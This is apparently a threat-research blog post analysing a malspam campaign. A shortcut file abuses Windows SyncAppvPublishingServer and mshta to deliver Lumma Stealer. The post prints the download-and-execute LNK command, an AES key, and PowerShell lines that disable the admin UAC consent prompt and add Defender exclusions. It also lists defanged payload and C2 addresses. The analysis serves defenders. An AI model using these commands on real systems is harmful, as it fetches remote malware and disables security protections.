Unveiling the Exploitative Tactics: Windows SyncAppvPublishingServer Exploited in the Wild to Deploy Lumma Stealer

        So, I recently came across an interesting Windows .lnk (Shortcut File) that caught my eyes due to fact that it was abusing one of the Living Off the Land Binary (LOLBIN) from Windows. Let’s discuss this campaign further.

5d9c44ef0226f952dd1269ba5bac9e4b0e8ada76ce7d4f6daad2fcd58521adc6 (invoice_06.23.lnk)

The file is being distributed as a Windows Shortcut File which comes with the .lnk extension. This ln file is in fact zipped under an archive named invoice_06_23.zip attached to spam emails. Threat actors have tried their best to lure the victim into launching this file in order to get infected, and these efforts can be seen in the below screenshot.

invoice_06.23.lnk

(Fig. invoice_06.23.lnk)

This campaign is being flooded via malspam with a subject line "Invoice Overdue - Please Take Action" with a zip attachement named "invoice_06_23.zip".

SyncAppvPublishingServer – LOLBIN

The target in this shortcut file is nothing but the clear abuse of Windows SyncAppvPublishingServer.vbs file with one of the arguments being a link to download the next stage payload.

C:\Windows\System32\SyncAppvPublishingServer.vbs ;\W*\\\\*2\\\\m*h*a*e ('http'+'://107[.]172[.]0[.]180/invoice_06.23.'+'hta')

 Interesting things to note here are:

  • ; is used as a break statement
  • \W*\\\\*2\\\\m*h*a*e makes sure to match C:\Windows\System32\mshta.exe

This command will download a hta payload from 107[.]172[.]0[.]180/invoice_06.23.hta and will execute it with mshta.exe.

46ef08a8cd6562f5c9d246662ac348caadc17286530ef3fd9cd14c547f41fbf0 (invoice_06.23.hta)

This file contains junk html code with a VBScript embedded within the <script> tag. This VBScript code is heavily obfuscated as seen in the below screenshot.

invoice_06.23.hta

(Fig. invoice_06.23.hta Obfuscated VBScript)

After de-obfuscating this VBScript, it comes to our understanding that this runs another VBScript that runs a powershell script. This can be seen in the below screenshot.

De-obfuscated VBS Running Powershell Script

(Fig. De-obfuscated VBS Running Powershell Script)

AES Encrypted Powershell Script

This powershell script from the de-obfuscated VBS has another powershell script that is encrypted with AES Encryption. The AES configurations used are as follows:

Key

cEyEaFkXgeAPMuvwPKCnTbsIMprryQLV

IV

0000000000000000

Mode

ECB

Block Size

128

Key Size

256

(Table. AES Configurations)


CMSTP Abuse

The decrypted powershell script reveals the further operations of this kill chain. It mainly has two major functionalities:
  1. Abuse cmstp.exe LOLBIN to achieve the following goals:

    • Bypass Admin UAC consent prompt via Registry Key

      powershell -NoLogo -WindowStyle hidden -NonInteractive -NoProfile -ExecutionPolicy UnRestricted Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0

    • Add C:\Users\{username}\AppData\Roaming to Windows Defender exclusion list

      powershell.exe -NoLogo -WindowStyle hidden -NonInteractive -NoProfile -ExecutionPolicy UnRestricted Add-MpPreference -ExclusionPath $env:AppData;

      This abuse of cmstp has been copied by the threat actors from a POC found on GitHub at: https://gist.github.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1

  2. Download the next stage payload, which is, Lumma Stealer from the following URL and drop it in the C:\Users\{username}\AppData\Roaming directory:
    http://107[.]172[.]0[.]180/invoice.exe

06810a7d576fc02e44a135364d1b17014081be39675bdb4b48f87799dbacf471 (invoice.exe)

This is the final payload that is the Lumma Stealer stealing sensitive victim information and is sending it back to it's C2 at gservice-node[.]io. This is the LummaC2 Build 20233101.
A passionate Threat Researcher and a Cybersecurity enthusiast.

Comments

Post a Comment